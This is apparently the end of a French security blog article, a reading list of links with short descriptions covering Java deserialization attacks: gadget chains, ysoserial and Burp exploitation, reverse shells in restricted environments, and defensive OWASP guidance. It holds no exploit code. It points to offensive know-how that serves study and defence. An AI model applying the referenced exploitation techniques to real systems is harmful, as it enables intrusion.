https://blog.netspi.com/java-deserialization-attacks-burp/

Article complet expliquant la désérialisation Java et listant plusieurs outils dédiés

https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/

Liste de recommandations sur l’usage de la désérialisation pour divers langages

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_Cheat_Sheet.md

Support d’un talk d’Insomnia sur la désérialisation pour plusieurs langages à l’OWASP New Zealand Day 2016

https://insomniasec.com/cdn-assets/Deserialization_-__What_Could_Go_Wrong.pdf

Exploitation de vulnérabilités de désérialisation Java dans des environnements sécurisés (systèmes avec pare-feu, Java mis à jour)

https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html

Exploiter la désérialisation Java en aveugle avec Burp et Ysoserial

https://www.n00py.io/2017/11/exploiting-blind-java-deserialization-with-burp-and-ysoserial/

Write-up du challenge Webgoat 8 (application d’entraînement développée par l’OWASP) d’exploitation d’une vulnérabilité de désérialisation non sécurisée

https://medium.com/abn-amro-red-team/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef

Article d’un reverse engineer de Tenable expliquant l’analyse de la CVE-2016-3737, et l’écriture de gadgets pour Jython

https://fr.tenable.com/blog/expanding-on-a-known-vulnerability-attacking-with-jython

Cours Java sur l’implémentation d’une classe sérialisable

http://www.javapractices.com/topic/TopicAction.do?Id=45

Support d’un talk d’Alvaro Munoz (@pwntester) et Christian Schneider (@cschneider4711) à l’OWASP AppSecEU 2016 sur les vulnérabilités de désérialisation de la JVM et comment s’en protéger

https://fr.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016

Support d’un talk de Chris Frohoff (@frohoff) et Gabriel Lawrence (@gebl) à l’OWASP San Diego sur la désérialisation Java

https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization

Analyse de l’attaque d’Equifax (143 millions de clients touchés aux USA) en 2017 par @brandur, reposant sur le chaînage de gadgets

https://brandur.org/fragments/gadgets-and-chains

Support d’un talk de Matthias Kaiser (@matthias_kaiser) à la HackPra WS 2015 sur l’exploitation de vulnérabilités de désérialisation non-sécurisée

https://fr.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478

Article de Ian Haken sur la découverte automatisée de chaînes de gadgets, notamment avec Gadget Inspector

https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains-wp.pdf

Article de @breenmachine de 2015 sur la désérialisation Java dans plusieurs technologies du marché et détail de 5 exploits (websphere, jboss, jenkins, weblogic et openNMS)

https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

Cet article Techniques et outils d’attaque sur les moteurs de désérialisation (Java) est apparu en premier sur RiskInsight.